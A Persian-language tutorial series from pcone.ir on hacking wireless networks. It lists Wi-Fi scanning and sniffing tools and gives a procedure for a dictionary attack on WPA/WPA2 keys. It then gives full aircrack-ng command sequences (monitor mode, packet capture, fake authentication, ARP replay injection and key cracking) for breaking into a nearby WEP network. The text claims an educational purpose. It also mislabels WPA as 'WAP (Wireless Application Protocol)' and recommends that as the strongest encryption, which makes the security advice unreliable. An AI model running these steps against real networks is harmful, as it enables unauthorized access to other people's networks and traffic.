how_to_hack_wifi-www.pcone.ir

سلام دوستان عزیز ، امروز سعی داریم تا در رابطه با روش های نفوذ به شبکه های وایرلس و بیسیم مباحثی را مطرح کنیم و روش های بر قراری امنیت در این گونه شبکه ها را آموزش دهیم .معرفی 16 ابزار اسکن شبکه های وایرلس برای اولین بار در سایت 

 

سرفصل های که در این مقاله مطرح می کنیم :

1- ابزار اسکن کردن وایرلس یا Wifi

2- اسکن کردن شبکه وایرلس یا شبکه Wifi

3-ابزار هک و کرک WEP

4- کرک کردن کلید WEP مربوط به شبکه های وایرلس یا شبکه های Wifi

5- ابزار Sniffing وایرلس

6- تکنیک های Sniffing وایرلس

7- اندازه گیری امنیت خودتان برای جلوگیری از حملات احتمالی

 

این یک آمو زش کامل از نفوذ به شبکه های وایرلس و ابزار های موجود می باشد و شما می بایست به اصطلاحات این بخش آشنا باشید.هدف ما فقط آموزش می باشد چون برای تامین امنیت می بایست راه های نفوذ را شناخت .

1- ابزار اسکن کردن وایرلس یا Wifi:

از این ابزار ها برای بررسی شبکه های موجود بیسیم در اطراف خود استفاده می کنیم . ابزار های زیادی در این زمینه موجود می باشد که یکی از معروف ترین آن ها NET STUMBLER می باشد.و برای مکینتاش ابزار MacStumbler .

حال به معرفی چند ابزار اسکن می پردازیم :

 

 

 NetStumbler for Windows operating systems :

این برنامه ابزاری است تحت ویندوز که برای پیدا کردن شبکه های بیسیم استاندارد 802.11b, 802.11a و 802.11g استفاده می گردد.حتی نسخه ای برای ویندوز CE هم دارد.

موارد استفاده :

1- Wardriving

2- شناسایی تنظیمات شبکه

3-پیدا کردن محل هایی با پوشش ضعیف در WLAN

4- تشخیص علل تداخل های بیسیمی

5-تشخیص نقاط غیر مجاز ("سرکش") دسترسی

لینک دانلود :

این ابزار کوچک کارش شبیه سازی عملکرد برنامه های مانند netstumbler, bsd-airtools, و kismet می باشد.و برای کسانی که می خواهند شبکه های وایرلس اطرف خودشان را ببینند مناسب است و بیشتر جنبه آموزشی دارد.البته با کارت های PCMCIA یا USB wireless devices سازگار نمی باشد.
لینک دانلود :
این ابزار برای تشخیص و جمع آوری بسته های اطلاعاتی شبکه ، پیدا کردن شبکه های مخفی و ... . این برنامه شبکه های با استاندارد 802.11 را شناسایی ، Sniff و تشخیص نفوذ می کند.و با هر نوع کارت شبکه ای که از نوع (rfmon) باشد کار می کند و توانایی Sniff کردن ترافیک استاندارد های 802.11b, 802.11a, 802.11g, and 802.11n را دارد.
لینک دانلود :
ردفنگ ابزاری برای پیدا کردن دستگاه های بلوتوث  پنهان از طریق brute-forcing و با خواند 6 بایت آخر آدرس دستگاه بلوتوث و خواندن نام از طریق تابع read_remote_name() می باشد .
لینک دانلود :
ابزاری برای نمایش شهر شما در نقشه شبکه بیسیم از طریق GPS زمانی که شما سوار ماشین هستید و یا در یک خیابان مستقر هستید. با انعطاف پذیری و تاثیر بالا برای شبکه های بیسیم .
لینک دانلود :
برنامه ای که شبکه های 802.11 (WLAN) را پیدا می کند و با قابلیت استفاده آسان برای GTK2 و حجم پایین برای استفاده به صورت قابل حمل (Portable). طراحی این برنامه به گونه ای است که به راحتی شبکه های وایرلس را پیدا نموده زیرا از معماری client-server در طراحی موتور جستجوی آن استفاده می شود و می تواند انواع Frontend ها را پیدا کند.
یک برنامه رایگان و متن آزاد که برای sniffer/analyzer شبکه وایرلس توسط جاوا نوشته شده.این برنامه وسایلی همچون iPaq را پشتیبانی می کند و بر روی کامپیوتر و یا لپ تاپ برای پیدا کردن شبکه های وایرلس کاربرد دارد.
لینک دانلود :
یک کنسول بر پایه نقشه برداری از شبکه مبتنی بر 802.11 در لینوکس می باشد.و گزراشاتی در رابطه با AP stuff like channel, WEP, ESSID, MAC و غیره به کاربر می دهد.
و کارت های مانند (Compaq, Lucent/Agere, … ) را پشتیبانی می کند و در آینده اکثر کارت ها را پشتیبانی خواهد کرد.و دارای یک پچ می باشد که در مقابل درایور  هسته  orinoco.c قرار دارد که این برنامه را قادر می سازد که دستور اسکن را به درایور فایل /proc/hermes/ethX/cmds  ارسال کند و سپس پاسخ را از سوکت netlink دریافت کند.این برنامه به این سوکت گوش می دهد  تا داده هایخروجی های را گزارش کند.
لینک دانلود :

یک نرم افزار standalone می باشد که به شما اجازه می دهد که نتایج بررسی یک شبکه را به برنامه Microsoft's MapPoint 2002  انتقال دهید.و WAPs های موجود را با قدرت سیگنال و نوع ارتباطشان ثبت می کند.

لینک دانلود :
دانلود استرامبورتر

یک ابزار تحت یونیکس برای Wireless Access Point و مجموعه ای از عمل هایی برای تنظیم و مانیتور کردن Wireless Access Points که از پروتکل SNMP استفاده می کنند.این  برنامه تحت لینوکس ، FreeBSD, NetBSD و  AIX قابل کامپایل می باشد.

لینک دانلود :
دانلود ایپی  اسکنر

 SSID Sniff :

این برنامه یک ابزار جذاب برای پیدا کردن access points و ذخیره ترافیک در شبکه کاربرد دارد. تنظیمات این برنامه از طریق یک اسکریپت صورت می گیرد و در کارت های Cisco Aironet و مدل های prism2 پشتیبانی می شود.

لینک دانلود :
دانلود اس اس آی دی

ویومون یک برنامه کاربردی برای سخت افزار وایرلس می باشد که تحت لینوکس و با کارت های که با افزونه Jean Tourrilhes پشتیبانی می شوند کار می کند که در کرنل 2.4 موجود می باشد .

لینک دانلود :

دانلود ویو مون

Wireless Security Auditor  :

 

Wireless Security Auditor به شما مدیر شبکه این امکان را می دهد تا امنیت شبکه وایرلس را در سازمان خود با اجرای ممیزی و تعیین سطح دسترسی شبکه مشخص نماید. Elcomsoft Wireless Security Auditor سعی در بازیابی کلید های WPA/WPA2 –PSK که دارای رمز عبورهستند می نماید تا نشان دهد که شبکه شما تا چه حد امن می باشد.

لینک دانلود :

یک Sniffer شبکه های وایرلس می باشد که می تواند اطلاعات انتقالی در شبکه 802.11 را تشخیص دهد.این برنامه متن آزاد می باشد و تلاش های موفق و ناموفق در شبکه را شناسایی می کند در ضمن نمودار عملکرد هر کاربر و پروتکل مربوطه  را نیز نشان می دهد و قدرت سیگنال دریافتی را مشخص می نماید.

لینک دانلود :

دانلود ایرترف

AirMagnet :

 

ایرمگنت یک آنالیز کننده صنعتی  WiFi می باشد که برای ممیزی کردن موبایل و مشکل زدایی شبکه های تجاری Wi-Fi استفاده می گردد.به مدیران IT کمک می کند به سرعت مشکلات شبکه بیسیم خود که توسط مشتریان گزارش داده می شود را در حالی که امنیت و اسیب پذیری های ممکن را بررسی می کند حل نماید.

لینک دانلود :

highspeed-wireless-www.pcone.ir

سلام دوستان عزیز در مطلب قبلی طریقه هک کردن شبکه وایرلس و Wifi - قسمت اول ابزار های مختلف اسکن شبکه های وایرلس را معرفی و توضیح مختصری دادیم در این مقاله ما سعی داریم طریقه کار با بعضی از این ابزار را توضیح دهیم .

اسکن کردن شبکه وایرلس به چه معناست ؟

ابتدا باید تمام شبکه های وایرلس اطراف خود را جا نمایی کنیم.برای انجام این کار هم ابزار های مختلفی داریم که توضیح داده شد که شبیه به اسکن آنتی ویروس ها می باشد.در اینجا ما از ابزار معروف NetStumbler استفاده می کنیم.در ادامه به توضیح این دستگاه می پردازیم :

 

چگونه از نت استامبلر برای اسکن شبکه وایرلس استفاده نمائیم؟

1- دانلود برنامه نت استامبلر و نصب آن

2-اجرا و شروع اسکن کردن برای پیدا کردن شبکه های وایرلس

3- بعد از اتمام اسکن شما می توانید لیستی از شبکه های وایرلس را مشاهده کنید.

 

netstumbler_-www.PCone.ir

List of Wireless Networks Scanned by NetStumbler

در لیست نمایش داده شده توسط این برنامه شما مشخصاتی مانند MAC, SSID, SPEED, VENDOR, TYPE  و غیره را مشاهده می کنید .

4- حال شما یک مک آدرس (MAC) را به دلخواه انتخاب کنید که می خواهید روی آن کار کنید.زمانی که شما روی یک شبکه مشاهده شده کلیک می کنید می توانید نمودار قدرت سیگنال آن را مشاهده کنید.

5- مشاهده کردید که نت استامبلر موارد بیشتر از یک نام (SSID) به شما نشان می دهد مثل MAC address,   Channel number, encryption type,  و  bunch   ، تمام این موارد می توانند در نفوذ به یک شبکه وایرلس و شکستن encryption  مورد استفاده قرار گیرند.

ما در کل دو نوع روش encryption در شبکه های وایرلس (Wireless Networks) داریم :

1- WEP)Wired Equivalent Privacy) : در این نوع امنیت به اندازه کافی در نظر گرفته نشده و زیاد امن نیست .معایب بسیاری در این نوع encryption  پیدا شده که به نفوذگر اجازه می دهد تا کلید های WEP را به آسانی بشکند .که در قسمت بعدی طریقه هک WEP را به شما توضیح خواهیم داد.

2- WAP)Wireless Application Protocol) : این نوع در حال حاضر بهترین و امن ترین نوع امنیت را برای شبکه های وایرلس دارد و به سادگی قابل نفوذ مثل WEP نمی باشد چون برای هک این کد گذاری بایستی از طریق حملات brute-force و یا dictionary استفاده نمود.اگر کلید شما به اندازه کافی امن باشد حمله از طریق dictionary جوابگو نیست و ممکن است از طریق brute-force این امکان پذیر باشد.به این علت است که نفوذگر ها زحمت این دو روش هم نمی کشند.ولی یک راه ساده تر وجود دارد که هوشمندانه تر است روش نوبیش (noobish).که در مطالب بعدی توضیح خواهیم داد.

تصویری از مینی استامبلر برای گوشی های CE :

ministumbler_-www.PCone.ir

 

چگونه از شبکه خود در برابر نت استامبلر محافظت نمائیم ؟

1- اجازه broadcast ، نام شبکه (SSID) را ندهید.

2- همیشه سعی  کنید از رمز عبور قویتر استفاده نمایید .(ترکیبی از حروف و اعداد و کارکتر های خاص)

3- همیشه از بهترین و امن ترین متد ها برای کد گذاری استفاده کنید.(WAP)



wifi_hACKED-www.pcone.ir

در این مقاله نحوه بدست آوردن رمز عبور شبکه های وایرلس با قالب رمزنگاری WPA و WPA2 را آموزش می دهیم .در اینجا ما از برنامه  Elcomsoft Wireless Security Auditor استفاده می کنیم .

ویژگی های این برنامه :

1- بررسی امنیت شبکه وایرلس شما

2- شنود بسته های شبکه وایرلس

3- بررسی  قدرت و امنیت کلید و رمز شبکه وایرلس

4- تست انواع حملات روی شبکه وایرلس شما

و ...

طریقه انجام :

1- دانلود و نصب برنامه و اجرای آن

Wireless-Security-Auditor-www.pcone.ir

2- رفتن به منوی  File ----> Add WPAPSK Hash Manually

Wireless-Security-Auditor-File-www.pcone.ir

3- در پنجره ظاهر شده نام SSID شبکه وایرلس مورد نظر را وارد نمائید.

Wireless-Security-Auditor-SSID-www.pcone.ir

4- حال این برنامه با استفاده حمله دیکشنری شروع به جستجو کلمات رمز می کند .

Wireless-Security-Auditor-WPA-WPA2-www.pcone.ir

5- این برنامه شروع به بررسی کلمات می کند و در صورت پیدا کردن کلمه عبور را به شما نشان می دهد.





هک پسورد WEP وایرلس با Back Track

backtrack5-wep-www.pcone.irBack Track 5 WEP Cracking | airmon ,aircrack, airoplay ,airodump,aircrack

در این مقاله ما آموزش هک کردن رمز شبکه وایرلس با رمزنگاری WEP را با استفاده از سی دی های back track آموزش می دهیم .با توجه به اینکه شبکه های با رمزنگاری WEP از قدرت کمتری برخوردارند می توان به سادگی آن ها را رمز گشایی نمود .

نیازمندی های :

1- سی دی زنده بک ترک (Back Track Live DVD)

2- کارت شبکه بیسیم

 

مراحل کار:

1- ابتدا لوح فشرده را در سیستم قرار داده و بوت می کنیم.

2- بعد از بوت شدن سیستم عامل به ترمینال لینوکس می رویم .

و سپس دستورات زیر را به ترتیب وارد می کنیم :

airmon-ng

airmon-ngstart1-www.pcone.ir

با دستور بالا شما لسیت تجهیزات شبکه سیستم خود را مشاهده می کنید .

در مرحله بعد شما باید با دستور زیر کارت شبکه وایرلس خود را در حالت مانیتورینگ قرار دهید :

airmon-ng start [device]

3- حال شما باید لیست شبکه های وایرلس در اطراف خود را مشاهده نمائید که برای این منظور باید از دستور زیر استفاده نمائید :

airodump-ng [device]

airodumpwifi0

شما حال می توانید لیست شبکه ها به همراه ((MAC address (BSSID), channel (CH) and name (ESSID) را مشاهده کنید .

حال نیاز به جمع آوری اطلاعات از شبکه مورد حمله دارید شما می بایست یکی از آن ها را انتخاب نموده و سپس مشخصات آن را با دستور زیر وارد نمائید :

airodump-ng -c [channel] -w [network.out] --bssid [bssid] [device]

airodumpoutput

بعد از اجرای این دستور ، اطلاعات بسته های شبکه مورد نظر شروع به جمع آوری می شود.توجه داشته باشید این روش برای شبکه های با رمزنگاری WEP کاربرد دارند .

4- حال یک ترمینال جدید باز کنید و دستور زیر را که برای ارسال بسته های تقلبی به سمت شبکه مورد هدف استفاده می شود استفاده کنید و نتایج حاصل از آن را در فایلی که قبلا مشخص کردید ذخیره می کند .

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device]

aireplayfakeauth

اگر مرحله بالا موفقیت آمیز بود حال شما می توانید اطلاعاتی که برای بدست آوردن رمز عبور استفاده می شود را بدست آوردید :

حال از دستور زیر استفاده می کنیم :

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]

aireplayfakeauth

بعد از استفاده از دستور بالا شما باید منتظر بمانید تا بین 10,000-20,000 داده بسته جمع آوری شود تا بتوانید رمز را پیدا کنید .

5- حال در مر حله آخر از دستور زیر استفاده کنید تا بسته ها را مشاهده کنید :

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b [bssid] -h 00:11:22:33:44:66 [device]

aireplayattack2p-www.pcone.ir

حال وقتی که به اندازه کافی بسته دارید می توانید رمزنگاری را انجام دهید :

aircrack-ng -n 128 -b [bssid] [filename]-01.cap

crackng-www.pcone.ir